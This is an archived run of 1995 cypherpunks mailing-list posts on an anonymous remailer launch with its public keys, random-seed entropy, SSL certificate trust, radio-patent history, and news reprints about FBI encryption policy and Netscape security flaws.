is a consultant regarding business on the Internet for Fortune 500
companies, and consultant r egarding business on the Internet for
Fortune 500 companies, and is a frequent speaker in North America
and Europe about business, marketing and education on th e
Internet. A former university Professor and Dean, she holds a
doctorate from Syracuse University. Ellsworth is the author
numerous books, including The Internet Business Book, Marketing
on the Internet, the Internet Business Kit (John Wiley & Sons), and
Education on the Internet (Sams/Macmillan). She serves on the
Survey Working Group of the Internet Society.

12.     Su-Shing Chen
Professor of Computer Science
University of North Carolina

Dr. Chen received his Ph.D.in 1970 from the University of
Maryland. He was on th e faculty of University of Florida, Georgia
Tech, University of Maryland, and University of North Carolina.
from 1983-85 and 1991-95, he served as NSF Program Directors
of Intelligent Systems, Knowledge Models & Cognitive Systems,
and Information Technology & Organizations.

13.     Dr. Arthur Keller
Senior Research Scientist
Stanford University

Dr. Arthur Keller  is a Senior Research Scientist at Stanford
University.  He is  Project Manager of Stanford University's
participation in CommerceNet, which is  doing the first large-scale
market trial of electronic commerce on the Internet.  He leads the
effort on smart catalogs and virtual catalogs.  He was Manager of
the Penguin project, to provide sharing of persistent object data
among multiple applications.  He is also working on managing
inconsistency in federated, autonomous database systems.  His
publications include work on database security, databases on parallel
computers, incomplete information in databases, database system
implementation, hypertext databases, and computerized typesetting.

 14.     Dr. Jan Stallaert
Assistant Professor
The University of Texas at Austin

Dr. Stallaert received his Ph.D. from UCLA in the area of
management science.  He has been working in the area of supply-
chain management and large-scale logistics problems for several
years.  He is also a consultant for several Fortune 500  companies.

15.     Dr. Preston McAfee
Professor
The University of Texas at Austin and MIT

Dr. McAfee is a leading expert on electronic auctions.  He has been
retained as the principal consultant by the Federal Communications
Commission to devise mechanisms for allocating wireless
frequencies.  He is also the editor of the prestigious American
Economic Review.


--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wmono@Direct.CA (William Ono)
Date: Mon, 25 Sep 95 10:02:11 PDT
To: rops@c2.org
Subject: New remailer now active.
Message-ID: <199509251503.IAA08771@fun.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have an anonymous remailer running at wmono@spook.alias.net - the domain
may or may not change (anybody have any suggestions?).  It runs Mixmaster
2.0.1 and Ghio2 to give both Type I and Type II support.  In the near
future, when I have some time on my hands, I will upgrade to Mix2.0.2.

This remailer is going public as of now.  I have sent this message to
cypherpunks, remailer-operators, and rops, so my appologies in advance
if you receive multiple copies.

Please add it to your pingers and cover-traffic generators.

Although I have tested this remailer a lot, I have only done so from two
accounts, therefore I am not certain of its reliability.  Hopefully any
such problems will be ironed out over the next few days.  For this reason,
I would advise against using it for sensitive materials for a week or so.
If you encounter any difficulties, please contact me at the remailer's
address.  Mail sent regarding the remailer to wmono@direct.ca (my main
addreess) will be ignored and/or deleted.

Type I remailer's default latency is set to 900 seconds (15 minutes) so add
a Latent-Time: +0:00 header if you want an immediate response.

The keys are below.


From: wmono@spook.alias.net (Anonymous Remailer)
Subject: Remailer keys (as requested)
 
Type I (ghio2) remailer key:
 
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
 
mQBtAzBeRcEAAAEDAMBA+IsCBBGwlCOpfsb0mqL6EiJGu/vnTjTcUPkz9yd8roz7
ym9qLpE9CVL0ND7kh8ctjmPfuvagt8VWhsvfo0cjpBY4J/1CtJelgTXCROyFsJGi
88V/fihQeq3u6De5iQAFEbQqQW5vbnltb3VzIFJlbWFpbGVyIDx3bW9ub0BzcG9v
ay5hbGlhcy5uZXQ+iQCVAwUQMF5GJjncl2jz9xa9AQGXHAP7BaO5SDFkSGnhB0vZ
UzPfC60WUhgq5mPHzmOYfrjiPPDz+MGmLs95zgAgkwNekYSBo9CQ9V9GIC+ZKV/R
CWyfkJEQsY7q4kku6BPYnkXhKuelt/vdLmyguEVbwsUrrLwFKNAGg2RiCZUrk/ej
6l7vIQpPuIZ2uKrteM8Opk3WK9SJAHUDBRAwXkclUHqt7ug3uYkBAXLpAv9BbjrL
RQe1m97hdE1J+nKWh+hUPILQa2U57LoFG18KRYsQcnrRjeYcIDN6Skc7AOOK21Ie
j44dn6T+9hXCokys7V09xRWpNamKbb6CpsVzM/T5OolXVq7LrkB5gV7VlJE=
=a8ZW
- -----END PGP PUBLIC KEY BLOCK-----
 
 
 
Type II (Mixmaster 2.0.1) remailer key:
 
=-=-=-=-=-=-=-=-=-=-=-=
wmono wmono@spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
 
- -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


- --    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGbDUjncl2jz9xa9AQH4RAP+PKHtLC4m3yNH2jZB2VK/Omod+lAqTfVZ
fQkmB6zTCi4y0++8zOLyhyzOZJaG3mwDe++DsW5qf3N7KSfcGlwdwChukyAvnzUC
9YxGODMj0x0a8cj/6XvClMsFtB99clzSfhy8IcTdSQDJOv5PoeHo1GkTuXvgjIyY
2YCDG/pdQpg=
=L3cw
-----END PGP SIGNATURE-----


--    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@eskimo.com (Brian C. Lane)
Date: Mon, 25 Sep 95 10:01:15 PDT
To: sryan@reading.com
Subject: Re: Crypto in Wired
Message-ID: <199509251504.IAA12863@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Sep 1995 20:00:02 -0400 you wrote:

>Good issue of Wired this month (10/95)
>

  I also noticed that on page 35 Chrysler has awarded Philip Zimmerman a 1995 Chrysler Award of Innovation in Design. Its nice to see large corporations taking notice cryptography.

   Brian

---------------------------------------------------------------------------
blane@eskimo.com                      | Finger for PGP key
http://www.eskimo.com/~blane          | Privacy, Security, and Electronics
ftp://ftp.eskimo.com/~blane           | Misc. Interesting files




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 25 Sep 95 10:03:35 PDT
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: `Random' seed.
In-Reply-To: <9509251229.AA23816@alpha>
Message-ID: <9509251324.AA23974@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker writes:
 > I don't think that anyone has suggested otherwise.  I believe that
 > `clock skew' was the underlying source of randomness that Matt Blaze
 > mentioned in the message where I first saw that code.

Yes, looking at Matt's code I think I believe it.

 > I have no idea how reasonable it would be to use this approach in
 > Netscape, however if it were available as an option to generate, say
 > 300 bits, I'd personally be plenty willing to let it chew up five
 > minutes while I get my morning caffeine.

If you look at it that way (the software just generates new bits every
once-in-a-while, like daily) I guess I wouldn't mind.  I mean, heck,
it's not like there aren't 3 dozen other random daemons that pop up
and eat my CPU every now and then :-)  It'd only really be a problem
if it were used as an "operational" source of random bits.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Sep 95 10:04:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in
In-Reply-To: <9509250357.AA21926@cs.umass.edu>
Message-ID: <0THZBD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Some unknown person writes:
>> It just moves the prior art date from the date of invention to the date
>> of filing the patent application.

>What happens if the chronology goes like this ?
>
>(0) Alice invents a snaffleblort.
>(1) Bob invents a snaffleblort.
>(2) Bob files for a patent on a snaffleblort.
>
>From what you said, it would appear that Alice's prior art won't count when

>it comes to considering the validity of Bob's patent claim. Is that correct?

The bizarre history of the invention of radio comes to my mind. Perhaps we can
learn something from it. The Russian Alexander Popov taught for 18 years at a
naval school in Kronstadt (near St Petersburg, Russia). He was fascinated by
Hertz's 1888 paper on electromagnetic waves and worked with his students on
improving his results. In 1889 Russian Navy granted him funds to investigate
the use of electromagnetic waves for telecommunications. It's undisputed that
Popov invented the antenna in 1894, and built a (subsequently widely used)
apparatus for advance warning of thunderstroms in 1995. Now the disputed part:
Popov published his paper _Pribor dlja obnaruzhenija i registrirovanija
elektrichiskikh kolebanij_ in the January 1896 issue of _Zhurnal Russkogo
Fiziko-Khimicheskogo Obshchestva_. In it he described the first radio
receiver. On May 7, 1895 and March 12, 1896 Popv made public presentations to
the Russian Physico-Chemical Society demonstrating his invention and (in March
1896) transmitted the words "Heinrich Hertz" (in a Morse-like code) at a
distance of 250 meters.

In June 1896 Gulielmo Marconi filed for a patent in England. He offered to the
British government his inventions for wireless transmission of signals, whose
details he kept secret. The news of his application and the description of his
invention weren't made public until June 1897, when the patent was granted, at
which point Popov raised hell and wrote letters to numerous newspapers,
claiming that Marconi's patent application was substantially identical to
Popov's publications. Meanwhile, Popov continued working on his transmitters/
detectors; by the spring of 1897 he was transmitting at 640m. He got more
funds and built 5km equipment by the summer of 1897. In 1900 he installed a
production radio-telegraph system between several islands in the Gulf of
Finland 50 km apart. After the Marconi incident, Russians viewed radio
transmissions technology as a military secret and didn't publish these results
until many years later, although comparable technology was available
commercially in the West. Popov was always low on funds. Marconi, a brilliant
entrepreneur, sold stock in his corporation, raised capital, hired other
prominent scientists to work with him, and was developing new technologies
much faster.

In 1901 Marconi was transmitting radio signals across the Atlantic Ocean, and
Popov retired from the naval school and went to teach at the SPB electro-
technical institute; he was soon elected its president. In 1904, before the
beginning of Russo-Japanese war, the Russians had to buy in great hurry a
large quantity of radio receivers/transmitters - made commercially in Germany
under Marconi's patent. Popov, no longer with the Navy, got to supervise their
installation in Russian naval ships. (Russia lost that war pretty miserably,
by the way.)

What, you might ask, is the cryptographic relevance of all this? Well, in 1914
Russia was waging war against Germany. Russian military officers in East
Prussia relied on radio to transmit information. Russians knew about crypto,
but the key distribution was so screwed up that most on their transmissions
were in cleartext. (Besides, radio was supposed to be a Russian invention not
available to the uncultered foreigners.) Germans reportedly found the
intercepted radio transmissions most helpful. Germans also broke the weak code
used by the Russians in east prussia within weeks. Their complete knowledge of
Russian weaknesses and troop movements led to Russian defeat in East Prussia,
after initial advances.

(The last claim is from the book _Tajnopis' v istorii Rossii_ (Cryptography in
Russian history) by T.A.Soboleva; someone ought to publish its translation.)

Soboleva also mentions that East Prussia had an advanced phone system which
the Russians didn't disable. On several occasions German civilian from remote
farms called Germany from across the front lines and reported on what the
Russians were up to.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 25 Sep 95 10:10:14 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <Pine.SOL.3.91.950925090641.7344B-100000@orb>
Message-ID: <199509251247.IAA27297@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 25,  9:35, Eric Young sent the following to the NSA's mail archives:
> Subject: Re: SSL Man-in-the-middle
||
|| On Fri, 22 Sep 1995, David J. Bianco wrote:
|| > Has anyone given much thought to the feasability of a
man-in-the-middle
|| > attack against an SSL (or other similar) transaction?  To me, the
|| > possibility seems obvious, so I figure it must have been discussed
before,
|| > though I haven't seen it.
|| ....
|| > Since neither the browser nor the server perform any authentication
checks,
|| > neither Bob nor Alice know they are really speaking to Mallet.  The
best
|| > Alice can do is check the IP address of the client she's speaking to,
but
||
|| Ah, err, the infamious problem of Netscape Navigator refusing to talk to
|| SSL httpd's because they don't have a certificate issued by Verisign is
|| caused by the client authentication the Server certificate.
|| To get a Verisign signed x509 certificate requires quite a bit of proof
|| that your company is who they claim they are.  So server authentication
|| is used.
||

Not so.  VeriSign can only vouch for identity, not intention.  I can fork
out $300 (at last count) and get a signed certificate for my fake company.
 If the stakes are high enough, I can incorporate fairly cheaply, get a
business license, and then I'd have a real company I could submit as.

Or, if I'm lazy, don't have enough money, or unwilling to leave a paper
trail, I'd break into someone's weakly secured server and steal their
certificate.

In either case, I've obtained a "legitimate" signed certificate for
illegitimate purposes.  That's why I don't think just verifying the
signature on the certificate is nearly enough.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Sep 95 10:11:04 PDT
To: cypherpunks@toad.com
Subject: Golden Coy Freeh
Message-ID: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, January 25, 1995, p. D5.

   The F.B.I. Sting Operation on Child Pornography Raises
   Questions About Cryptography

   By Peter H. Lewis


   Federal agents swooped down on more than 125 homes and
   offices across the United States on Sept. 13, seizing
   computers and diskettes from people suspected of
   trafficking in child pornography over the America Online
   network. But to date, the number of arrests in the sting
   operation remains at 15.

   More arrests are expected, but why haven't more occurred?

   Last week, Louis J. Freeh, the director of the F.B.I.,
   offered an oblique explanation for the seemingly low
   initial success rate.

   At least some of the suspected child pornographers had used
   data encryption software, Mr. Freeh said Thursday in
   remarks at an International Cryptography Institute
   conference in Washington. In other words, they had
   scrambled their computer files so that only someone with
   the password -- or with proper code-breaking skills --
   could view the contents.

   Mr. Freeh wisely did not say whether the F.B.I. agents were
   able to decipher the encrypted files seized in the
   investigation. It would be foolhardy, from a
   law-enforcement perspective, to tip one's hand.

   If the head of the F.B.I. acknowledged that his agency was
   powerless to crack a cryptography program like Pretty Good
   Privacy, the stampede for that software on the Internet
   would make the run on Windows 95 look puny.

   From a political perspective, Mr. Freeh's coyness is shrewd
   as well. By making even a subtle suggestion that some child
   pornographers may walk free because of unbreakable
   cryptography, he gains more leverage in seeking
   Government-mandated controls over the use of encryption
   technology.

   Mr. Freeh said that encryption was a "public safety" issue,
   and he said law-enforcement agencies around the world "will
   not tolerate" the use of private data encryption to impede
   investigations. He said encryption had also been
   encountered in the Philippines in a plot to blow up an
   American jet and to assassinate Pope John Paul lI (in that
   case, at least, one can presume the code was cracked.)

   It seems worthwhile to point out that even if the suspects
   in the child pornography sting, called Operation Innocent
   Images, used cryptography, that did not provide evidence
   that they were doing something illegal. Our legal system is
   predicated on the belief that one is innocent unless proved
   guilty, and there is no exception clause for technology.

   "Fortunately we are not yet at the point where the mere use
   of encryption overcomes the presumption of innocence," said
   David Sobel, staff counsel for the Electronic Privacy
   Information Center in Washington.

   Another point to remember is that the F.B.I. identified
   more than 100 suspects, and gathered sufficient information
   to warrant raids, using existing laws and enforcement
   techniques. On the other hand, there is no denying that
   child pornographers use data encryption to keep co-workers,
   family members and police from discovering their secrets.

   "We are involved in a couple of jobs every week resolving
   some kind of a child pornography investigation," said Eric
   K. Thompson, president of Access Data Inc. of Orem, Utah,
   a private company that specializes in cracking encrypted
   files for corporations and Government agencies.

   The Government's elite codebreakers at the National
   Security Administration are prohibited by law from using
   their talents against American citizens. The F.B.I. has its
   own code-breaking experts, but it routinely calls on
   independent experts like Access Data to help on some cases.

   After eight years of breaking into encrypted files, ranging
   from situations involving secretaries who simply forgot
   their passwords for important memos to cases involving
   corporate computer systems that were encrypted by
   disgruntled employees, Mr. Thompson has concluded:
   "Basically, the criminal element is becoming more computer
   literate, and they are discovering encryption. Files are
   becoming more difficult to break."

   Dorothy Denning, an expert in cryptography and a professor
   of computer science at Georgetown University in Washington,
   said she recognized the importance of encryption for
   businesses seeking to protect information. At the same
   time, she said, she also recognized the problems that
   law-enforcement agencies face because of cryptography.

   "So many people had been saying people in law enforcement
   weren't having this problem, and I didn't believe that,"
   Dr. Denning said. So in May, she said, she spent two days
   calling sources at law-enforcement organizations. "I came
   up with over 20 cases -- child pornography, terrorism,
   murder, embezzlement fraud, tax protesters, export
   violations -- and, in some cases, they were able to crack
   it, and others they couldn't," she said.

   What can be done? The Administration's plan is to seek
   voluntary compliance with a "key escrow" plan, which would
   enable citizens to use strong, private cryptography as long
   as a copy of the software "key" were made available to law
   enforcement officials.

   Last week, Mr. Freeh stressed that he preferred a voluntary
   approach. But "if consensus is impossible" on the
   encryption issue, he said, the F.B.I. might consider other
   approaches.

   The debate is certain to heat up as more information about
   Operation Innocent Images becomes known. There are no
   comforting answers, only an echo of advice from a time
   predating the Internet: There is no solution. Seek it
   wisely.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 25 Sep 95 10:09:45 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <199509251256.IAA27310@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 25,  2:38, Phil Karlton sent the following to the NSA's mail
archives:
> Subject: Netscape "random" number seed generator code available
|| As is mentioned in the README, more will need to be done to find more
|| bits of entropy. (Too much of a good thing is still not enough.)
|| However the security team believes that the RNG seed is no longer the
|| weak link and candidate for attack.  So I am personally volunteering
|| to have my had shaved if a discovered deficiency in this code results
|| in an easily attacked generated seed. [You will be expected to show
|| your work. :-)]
||

Will you put a picture up on http://www.netscape.com/ someone does find
a problem? 8-)

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 25 Sep 95 10:10:42 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: `Random' seed.
In-Reply-To: <9509251229.AA23816@alpha>
Message-ID: <9509251300.AA22090@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: m5@dev.tivoli.com (Mike McNally)
    Date: Mon, 25 Sep 1995 07:29:01 -0500
    
    I also have some doubts as to the randomness of this; I suspect
    that the kernel is rather deterministic in its scheduling
    practices.

I don't think that anyone has suggested otherwise.  I believe that
`clock skew' was the underlying source of randomness that Matt Blaze
mentioned in the message where I first saw that code.

In any case, a number of people have expressed interest in seeing
signs of non-random behavior.  As far as I know, no one has said
anything if they've found such signs.  I've tried to find some, but
only with very simple tests.  I generated a quarter megabits and found
that:

 - I can only compress it to about 32Kb, i. e. 256 k bits.  Tim May
   has suggested that compressibility is getting to be a good metric
   for entropy.

 - It seems to contain roughly equal numbers of:
    * 0s and 1s
    * 00s, 01s, 10s, and 11s
    * etc. I forget how high I checked.

 - It contains some rather long sequences of 0s and 1s.  I think on
   the order of 20.

I have no idea how reasonable it would be to use this approach in
Netscape, however if it were available as an option to generate, say
300 bits, I'd personally be plenty willing to let it chew up five
minutes while I get my morning caffeine.  I realize that some people
would not.  It certainly couldn't hurt to throw a few bits gathered
this way into the mix.  Also, it may be possible to get more than one
bit of entropy per second using this approach, I was merely showing
the code as Matt originally presented it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGanppNR+/jb2ZlNAQE2jQQAx1dj/WjMK4XeNr4mZxyW6G9TKL1ZKqOE
tkePnuEujXQDxoEy5UNGWo36NG1hn564wprdS5e4aCQwZaPhPOuXZTd9uPEWXdqq
j5WyNmzBqmSIlCU+wlEVnBpYWbgxdPC1Lx8ckkxxX07+F3B+ftibrfB+t7ysDDPC
LOJ2PCXr/7I=
=8lGs
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Taht <mike@icanect.net>
Date: Mon, 25 Sep 95 10:08:47 PDT
To: cypherpunks@toad.com
Subject: Key signing at Miami Convention
Message-ID: <199509251301.JAA05080@alice.icanect.net>
MIME-Version: 1.0
Content-Type: text/plain


I am giving an internet security seminar at the 

"The Internet and World Wide Web" Conference at
the Miami Hyatt Regency, tomorrow, tuesday, Sept 26,
all day.

I'll be armed with a laptop if there are folk attending that
want to sign and exchange PGP keys.

________________
Michael

--
Michael Taht		| "You got me hummin" 	   - B. Joel
VP, Technical Stuff	| "Ain't nobody's bizness" - Taj Mahal
mike@icanect.net	| "I'm from the government,
http://www.icanect.net	|  I'm here to help" 	   - Anon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Mon, 25 Sep 95 10:05:57 PDT
To: khijol!toad.com!cypherpunks@cygnus.com
Subject: Netscape flaw hits the big time
Message-ID: <199509251404.JAA08561@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Just heard on the CBS hourly radio news that Netscape will release a new 
version on Wednesday correcting a flaw that would "allow hackers access 
credit card numbers."

As usual, they got it all wrong, but what do you expect?
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGa29CS9AwzY9LDxAQHJwAQAlCcmPauUPnBIpBx5e5ZZpdnQZk5dhEMe
BMZe+aA+A0mZ6aqgiA8wzZyjbSkYMuzoUM+IQi4c4MraoWNXGAFfO+9dL4WMmdqI
AMBk6WaIoiYjCjCd7SNxETlh4+BaWICul/04isiiLE345j6VgU2xGtJZT4UJMurf
6/dy7ztSYEQ=
=P3jw
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Sep 95 10:09:08 PDT
To: cypherpunks@toad.com
Subject: JAV_jiv
Message-ID: <199509251313.JAA08442@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-25-95. NYPaper:

   "Making the PC Come Alive. A Software Language That Puts
   You in the Picture." By John Markoff

      A new computer language known as Java is an emerging
      technology that many industry experts expect to be the
      next big thing in computing. Just as popular World Wide
      Web "browser" software like Netscape has transformed the
      Web from a scientist's research tool into a consumer
      medium over the last two years, many computer industry
      researchers and executives predict that the Java
      programming language will transport the Web to the next
      level.


   JAV_jiv  (17 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Sun, 24 Sep 95 17:47:19 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net>
Message-ID: <Pine.SOL.3.91.950925090641.7344B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 22 Sep 1995, David J. Bianco wrote:
> Has anyone given much thought to the feasability of a man-in-the-middle
> attack against an SSL (or other similar) transaction?  To me, the
> possibility seems obvious, so I figure it must have been discussed before,
> though I haven't seen it.
....
> Since neither the browser nor the server perform any authentication checks,
> neither Bob nor Alice know they are really speaking to Mallet.  The best
> Alice can do is check the IP address of the client she's speaking to, but

Ah, err, the infamious problem of Netscape Navigator refusing to talk to 
SSL httpd's because they don't have a certificate issued by Verisign is 
caused by the client authentication the Server certificate.
To get a Verisign signed x509 certificate requires quite a bit of proof 
that your company is who they claim they are.  So server authentication 
is used.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Mon, 25 Sep 95 10:07:19 PDT
To: cypherpunks@toad.com
Subject: (Another) WSJ article
Message-ID: <Pine.SUN.3.91.950925093325.14983A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


	 Netscape Software for Cruising Internet Is Found to
		      Have Another Security Flaw

Another security flaw that has long plagued the Internet has been
found in software by Netscape Communications Corp. and others, raising
concerns for the privacy and safety of information on the global
computer network.

The flaw in Netscape's popular Navigator software, which helps users
cruise the multimedia portion of the Internet known as the World Wide
Web, is the third defect in the software discovered by the
"Cypherpunks" discussion group in little over a month.

[end of excerpt--it's a long article]

The article quotes William Cheswick and Rich Lethin, and mentions the
cypherpunks several times.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Sep 95 10:06:52 PDT
To: cypherpunks@toad.com
Subject: WSJ on Netscape Hole 3
Message-ID: <199509251351.JAA11538@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, September 25, 1995, p. B12.

   Netscape Software for Cruising Internet Is Found to Have
   Another Security Flaw

   By Jared Sandberg


   Another security flaw that has long plagued the Internet
   has been found in software by Netscape Communications Corp.
   and others, raising concerns for the privacy and safety of
   information on the global computer network.

   The flaw in Netscape's popular Navigator software, which
   helps users cruise the multimedia portion of the Internet
   known as the World Wide Web, is the third defect in the
   software discovered by the "Cypherpunks" discussion group
   in little over a month. Members of the Cypherpunk group,
   which includes mathematicians and hackers who discuss the
   security method of cryptography, last month broke
   Netscape's "key" that protects sensitive data by "brute
   force" -- the use of massive computing power. Last week,
   other members found a flaw that could let hackers
   essentially pick the lock in Netscape's software.

   Unlike the prior glitches, however, the latest flaw doesn't
   lend itself to the theft of multiple credit-card numbers.
   Instead, it could allow a savvy hacker to damage an
   Internet user's computer, such as crashing the computer or
   deleting files.

   "This is just another indication that Netscape isn't being
   careful," said William Cheswick, a security researcher at
   AT&T Corp.'s Bell Laboratories.

   Still, he said, the flaw goes well beyond Netscape. It
   first reared its head seven years ago when Cornell graduate
   student Robert Morris used it to create a "worm" that
   crippled thousands of computers on the Internet. Last
   February, the same kind of flaw was found in the popular
   Mosaic program created by the University of Illinois. But
   that strain of the flaw was more serious than its latest
   appearance because it affected the computers that store
   many users' credit-card numbers. Now experts are
   discovering that the flaw shows up in other so-called Web
   browsers such as Links and Arena.

   "We're so glad that the network dog dances, we don't
   realize that it's rabid," Mr. Cheswick said of the
   programming quality of many software packages.

   Marc Andreessen, vice president of technology at Netscape,
   said the company will issue fixes for the recent glitches
   later this week. He added that it's unclear whether
   anything other than temporarily crashing a user's computer
   could result trom the recent flaw. But, he said, once users
   adopt the modified software, "this won't be around long
   enough to cause a problem."

   Some, however, worry that another variation of the flaw
   will prove more difficult to cope with in the coming
   months. Bruce Fancher, president of Phantom Access
   Technologies Inc., operator of the Mindvox Internet access
   service, said a variation of the security hole has been
   found in several Unix software packages, which run on
   thousands of Internet computers that contain user's
   credit-card numbers and other personal information. It
   could cause far more damage than the Netscape flaw, he
   said. "This is going to be a big problem," warned Mr.
   Fancher, adding that he's been told that hackers are
   already devising software toolkits to exploit the hole.
   "This flaw is an easy mistake to make, but it's also easy
   to fix," he said.

   The latest flaw came to light early Friday morning when a
   reader of the Cypherpunk mailing list discovered the glitch
   and posted a message to the Internet. Basically, the
   software on an end-user's machine allows for commands that
   are too long, letting an intruder tack on an extra line of
   damaging code that could crash the computer. Instead, the
   software should verify the length of the commands that
   computers accept.

